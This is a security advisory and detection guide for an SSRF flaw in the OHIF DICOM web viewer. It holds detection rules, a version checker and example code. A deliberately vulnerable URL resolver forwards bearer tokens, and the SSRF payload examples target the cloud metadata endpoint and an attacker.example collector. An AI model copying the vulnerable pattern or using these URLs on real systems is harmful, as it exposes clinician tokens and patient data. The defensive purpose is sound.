The healthcare sector faces a critical risk with the disclosure of CVE-2026-12473, a Server-Side Request Forgery (SSRF) vulnerability affecting the widely deployed OHIF DICOM Web Viewer Framework. Rated with a CVSS v3 score of 8.2 (High), this flaw impacts versions v3.12.0 and prior. CISA has issued advisory ICSMA-26-176-02, highlighting the potential for attackers to steal authenticated clinician tokens via a crafted link, effectively compromising patient data confidentiality and system integrity within medical imaging environments.
Technical Analysis
Affected Products & Versions:
- Product: OHIF DICOM Web Viewer Framework
- Vendor: Open Health Imaging Foundation (OHIF)
- Affected Versions: <= v3.12.0
- Sectors: Healthcare and Public Health (Critical Infrastructure)
Vulnerability Mechanics:
The vulnerability resides in two data sources shipped in the default configuration: DICOMWebProxy and DICOMJSON. Both fetch whatever URL is supplied in a query parameter without validating it against an allowlist of expected hosts, which introduces a Server-Side Request Forgery (SSRF) condition.
The Attack Chain:
- Initial Access vector: An attacker crafts a malicious link to a vulnerable OHIF Viewer instance. The link carries a manipulated URL parameter pointing at an attacker-controlled destination or an internal service such as a cloud metadata endpoint.
- Exploitation: When an authenticated clinician opens the link (or it is triggered through another mechanism), the vulnerable OHIF instance processes the request.
- Payload Execution: The DICOMWebProxy or DICOMJSON data source issues a request to the attacker-supplied URL.
- Impact: Because the request originates from the trusted server, the attacker can use it to reach internal services or, more critically in this context, to capture the clinician's authentication token if it is carried in the request headers or reflected in a response body (for example via an Authorization or Referer header, or a specific API response).
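To make the data-source weakness concrete, the following added example (written for this page, not OHIF project code) contrasts an unvalidated resolver for the url query parameter with a hardened one. The function names, the PACS_ALLOWLIST hostnames and the bearer-token handling are assumptions for illustration; the real OHIF code paths are not reproduced here.

```javascript
// Added example, not OHIF project code: an unvalidated resolver for the
// `url` query parameter beside a hardened one. PACS_ALLOWLIST, the function
// names and the bearer-token handling are assumptions for illustration.

// Constructed allowlist of the DICOMweb hosts this deployment may load from.
const PACS_ALLOWLIST = new Set([
  'pacs.hospital.example',
  'dicomweb.hospital.example',
]);

// Vulnerable pattern: whatever `?url=` says is fetched, and the user's
// credential rides along. Returns the request that would be issued.
function vulnerableBuildFetch(queryString, bearerToken) {
  const target = new URLSearchParams(queryString).get('url');
  return { url: target, headers: { Authorization: `Bearer ${bearerToken}` } };
}

// Parse a dotted-quad IPv4 literal into an unsigned 32-bit number; null otherwise.
function ipv4ToInt(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const o = m.slice(1).map(Number);
  if (o.some((n) => n > 255)) return null;
  return ((o[0] << 24) >>> 0) + (o[1] << 16) + (o[2] << 8) + o[3];
}

// Ranges an SSRF target must never reach: RFC 1918, loopback, link-local
// (cloud metadata lives at 169.254.169.254) and "this network".
const BLOCKED_RANGES = [
  ['10.0.0.0', 8], ['172.16.0.0', 12], ['192.168.0.0', 16],
  ['127.0.0.0', 8], ['169.254.0.0', 16], ['0.0.0.0', 8],
];

function isBlockedIpv4(host) {
  const ip = ipv4ToInt(host);
  if (ip === null) return false;
  return BLOCKED_RANGES.some(([net, bits]) => {
    const mask = (~0 << (32 - bits)) >>> 0;
    return ((ip & mask) >>> 0) === ((ipv4ToInt(net) & mask) >>> 0);
  });
}

// Hardened pattern: parse, require https, refuse embedded credentials, refuse
// blocked IP literals, require an exact allowlist match, and only then attach
// the token. The WHATWG URL parser canonicalises IPv4 forms (octal, hex,
// single integer) before `hostname` is read, so the range check sees the
// real address.
function resolveDataSourceUrl(queryString, bearerToken) {
  const raw = new URLSearchParams(queryString).get('url');
  if (!raw) return { ok: false, reason: 'missing url parameter' };
  let parsed;
  try {
    parsed = new URL(raw);
  } catch {
    return { ok: false, reason: 'unparseable url' };
  }
  if (parsed.protocol !== 'https:') return { ok: false, reason: `scheme ${parsed.protocol} not allowed` };
  if (parsed.username || parsed.password) return { ok: false, reason: 'credentials in url' };
  const host = parsed.hostname;
  if (isBlockedIpv4(host)) return { ok: false, reason: `blocked address ${host}` };
  if (!PACS_ALLOWLIST.has(host)) return { ok: false, reason: `host ${host} not in allowlist` };
  return { ok: true, url: parsed.toString(), headers: { Authorization: `Bearer ${bearerToken}` } };
}

// Usage: the metadata-service link from the attack chain is passed through
// by the vulnerable resolver and rejected by the hardened one.
console.log(vulnerableBuildFetch('url=http://169.254.169.254/latest/meta-data/', 'tok'));
console.log(resolveDataSourceUrl('url=http://169.254.169.254/latest/meta-data/', 'tok'));
```

The allowlist check is on the hostname, so a DNS name that later resolves to an internal address (rebinding) is not caught here; that is why the egress filtering in the Remediation section is still required alongside input validation.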
Detection & Response
Detecting SSRF requires correlating web application access logs with outbound network traffic from the host that serves the viewer. Defenders should look for the serving process (a Node.js process when OHIF is served by one; otherwise the web server or reverse proxy in front of the static bundle) making unexpected outbound connections to non-allowlisted destinations or internal IP ranges, and for url parameter values in access logs that point anywhere other than the known DICOMweb endpoints.
Sigma Rules
---
title: Potential SSRF via OHIF Node.js Process Outbound Connection
id: 8a1b2c3d-4e5f-6789-0123-456789abcdef
status: experimental
description: Detects potential SSRF exploitation in OHIF Viewers by identifying the Node.js process making outbound connections to private, loopback or link-local IP ranges, indicative of internal service scanning or data exfiltration. Legitimate PACS destinations must be excluded before this is actionable.
references:
    - https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-176-02
author: Security Arsenal
date: 2026/04/22
tags:
    - attack.initial_access
    - attack.t1190
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith: '\node.exe'
        DestinationPort:
            - 80
            - 443
            - 8080
    internal_ranges:
        DestinationIp|cidr:
            - '10.0.0.0/8'
            - '172.16.0.0/12'
            - '192.168.0.0/16'
            - '127.0.0.0/8'
            - '169.254.0.0/16'
    condition: selection and internal_ranges
falsepositives:
    - Legitimate retrieval of DICOM images from internal PACS nodes (add those addresses as a filter_ selection and exclude it in the condition)
    - Linux deployments, where the image is 'node' rather than 'node.exe' and the logsource product must be changed accordingly
level: high
---
title: OHIF Web Access Anomaly - URL Parameter in Query String
id: 9b2c3d4e-5f6a-7890-1234-56789abcdef0
status: experimental
description: Detects attempts to exploit OHIF by looking for 'url' query parameters carrying a full URL in access logs, which may indicate an attempt to trigger the DICOMWebProxy or DICOMJSON SSRF. Because these data sources legitimately take a URL in this parameter, exclude your known DICOMweb endpoints before relying on it.
references:
    - https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-176-02
author: Security Arsenal
date: 2026/04/22
tags:
    - attack.initial_access
    - attack.t1190
logsource:
    category: webserver
    product: apache
detection:
    selection:
        c-uri|contains:
            - 'url=http'
            - 'url=http%3A'
    condition: selection
falsepositives:
    - The DICOMJSON and DICOMWebProxy data sources legitimately pass full URLs in this parameter; baseline the hosts your viewer is configured to load from and exclude them
level: medium
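The access-log rule above fires on any url=http, but OHIF's DICOMJSON and DICOMWebProxy data sources legitimately carry a full URL in that parameter, so the useful question is where the URL points. This added example (not part of the advisory or of the Sigma rule) applies that hunt to constructed Apache combined-format lines, extracting each url value and flagging those aimed at the cloud metadata address or at hosts outside a constructed allowlist. The hostnames, usernames, client addresses and log lines are all constructed.

```javascript
// Added example, not part of the advisory or the Sigma rule: apply the
// access-log hunt to constructed Apache combined-format lines and report
// `url` parameters that point somewhere other than the configured data source.
// Hostnames, users, client addresses and log lines are constructed for the example.

const KNOWN_DATASOURCE_HOSTS = new Set(['pacs.hospital.example']);
const METADATA_SERVICE_IP = '169.254.169.254';

// Constructed sample: a legitimate DICOMJSON load, a metadata-service probe,
// an attacker collector, and an unrelated request with no `url` parameter.
const SAMPLE_ACCESS_LOG = [
  '10.1.2.3 - clin01 [22/Apr/2026:10:15:02 +0000] "GET /viewer?url=https%3A%2F%2Fpacs.hospital.example%2Fstudies%2F1.2.3.json HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '10.1.2.3 - clin01 [22/Apr/2026:10:16:40 +0000] "GET /viewer?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [22/Apr/2026:10:17:11 +0000] "GET /viewer?StudyInstanceUIDs=1.2.3&url=https://attacker.example/collect HTTP/1.1" 200 128 "-" "curl/8.0"',
  '10.1.2.4 - clin02 [22/Apr/2026:10:18:00 +0000] "GET /viewer?StudyInstanceUIDs=1.2.3 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
];

// host ident user [time] "method uri proto" status ...
const LOG_RE = /^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /;

function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { client: m[1], user: m[2], time: m[3], method: m[4], uri: m[5], status: Number(m[6]) };
}

// Every decoded `url` value in the query string (the parameter may repeat).
function extractUrlParams(uri) {
  const q = uri.indexOf('?');
  if (q === -1) return [];
  return new URLSearchParams(uri.slice(q + 1)).getAll('url');
}

// Classify by where the URL points, not by whether it is present: presence
// alone is normal for the DICOMJSON and DICOMWebProxy data sources.
function classifyTarget(value) {
  let parsed;
  try {
    parsed = new URL(value);
  } catch {
    return 'unparseable';
  }
  if (parsed.hostname === METADATA_SERVICE_IP) return 'metadata-service';
  if (KNOWN_DATASOURCE_HOSTS.has(parsed.hostname)) return 'allowlisted';
  return 'external';
}

// Returns one finding per non-allowlisted target, with enough context to pivot on.
function huntAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const entry = parseLogLine(line);
    if (!entry) continue;
    for (const target of extractUrlParams(entry.uri)) {
      const verdict = classifyTarget(target);
      if (verdict === 'allowlisted') continue;
      findings.push({ time: entry.time, client: entry.client, user: entry.user, target, verdict });
    }
  }
  return findings;
}

for (const f of huntAccessLog(SAMPLE_ACCESS_LOG)) {
  console.log(`${f.time} ${f.client} ${f.user} ${f.verdict} ${f.target}`);
}
```

On the constructed sample this reports the metadata probe by clin01 and the external collector requested from 203.0.113.9, and stays silent on the legitimate PACS load. In a real hunt, classifyTarget would also apply the same private-range test used for egress filtering, and the user and client fields are what you pivot on to decide whose token to revoke.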
KQL (Microsoft Sentinel / Defender)
// Hunt for Node.js processes (OHIF) making outbound connections to private, loopback or link-local addresses
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "node.exe"
| where ActionType == "ConnectionSuccess"
| extend IsPrivate =
    ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or
    ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or
    ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or
    ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or
    RemoteIP == "169.254.169.254"
| where IsPrivate == true or RemoteUrl contains "metadata"
| project Timestamp, DeviceName, InitiatingProcessCommandLine, RemoteIP, RemoteUrl, RemotePort
| order by Timestamp desc
Velociraptor VQL
-- Hunt for Node.js processes with established connections to private, loopback or link-local ranges.
-- netstat() exposes the remote endpoint as Raddr.IP / Raddr.Port and the socket state as Status;
-- it does not carry the command line, so join against pslist() on Pid if that is needed.
SELECT Pid, Name, Family, Status, Raddr.IP AS RemoteIP, Raddr.Port AS RemotePort
FROM netstat()
WHERE Name =~ "node"
  AND Status =~ "ESTAB"
  AND (
       Raddr.IP =~ "^10[.]"
    OR Raddr.IP =~ "^192[.]168[.]"
    OR Raddr.IP =~ "^172[.](1[6-9]|2[0-9]|3[0-1])[.]"
    OR Raddr.IP =~ "^127[.]"
    OR Raddr.IP =~ "^169[.]254[.]"
  )
Version Check Script (Bash)
#!/bin/bash
# Version check for CVE-2026-12473: reports whether a deployed OHIF Viewer
# is at or below the last affected release (v3.12.0).
# Requires: read access to the deployment directory and its package.json.
set -u

OHIF_DIR="${1:-/var/www/ohif-viewer}"   # adjust the path or pass it as the first argument
VULNERABLE_MAX="3.12.0"                  # last affected version per the advisory
PKG="$OHIF_DIR/package.json"

echo "Checking OHIF Viewer installation at $OHIF_DIR..."
if [ ! -f "$PKG" ]; then
    echo "[ERROR] package.json not found at $OHIF_DIR. Please verify the installation path."
    exit 2
fi

# Pull the version string; strip quotes, commas, whitespace, CRs and a leading 'v'.
CURRENT_VERSION=$(grep -m1 '"version"' "$PKG" | awk -F: '{print $2}' | tr -d '" ,\r\t' | sed 's/^v//')
if [ -z "$CURRENT_VERSION" ]; then
    echo "[ERROR] Could not read a version from $PKG."
    exit 2
fi
echo "Detected Version: $CURRENT_VERSION"

# 'sort -V' orders semantic versions; if the vulnerable maximum sorts last
# (or is equal), the installed version is within the affected range.
HIGHEST_VERSION=$(printf '%s\n' "$CURRENT_VERSION" "$VULNERABLE_MAX" | sort -V | tail -n 1)
if [ "$HIGHEST_VERSION" = "$VULNERABLE_MAX" ]; then
    echo "[ALERT] Vulnerable version detected ($CURRENT_VERSION <= $VULNERABLE_MAX)."
    echo "Action Required: Update OHIF Viewers immediately per CISA Advisory ICSMA-26-176-02."
    exit 1
else
    echo "[OK] Version $CURRENT_VERSION is newer than $VULNERABLE_MAX; confirm it matches the vendor's fixed release."
    exit 0
fi
Remediation
- Patch Immediately: Update the OHIF DICOM Web Viewer Framework to the latest release. Versions v3.12.0 and below are vulnerable; move to a version newer than v3.12.0 as soon as the vendor release is available, and confirm the fixed version against the vendor advisory rather than assuming the next release number.
- Network Segmentation: Implement strict egress filtering on the host serving the OHIF Viewer. The application should only be allowed to reach the PACS or DICOMweb servers it needs and the identity provider it authenticates against. Block access to the internet and to non-essential internal subnets, including cloud metadata services such as 169.254.169.254.
- Configuration Audit: Review the configuration of the DICOMWebProxy and DICOMJSON data sources. Ensure that any URL parameter they accept is validated against a strict allowlist of permitted hosts or IPs and that the scheme is restricted to HTTPS.
- Review Access Logs: Audit web server access logs for evidence of exploitation, specifically requests whose URL parameter points to external or unexpected internal destinations.
Vendor Advisory: Open Health Imaging Foundation / CISA ICSMA-26-176-02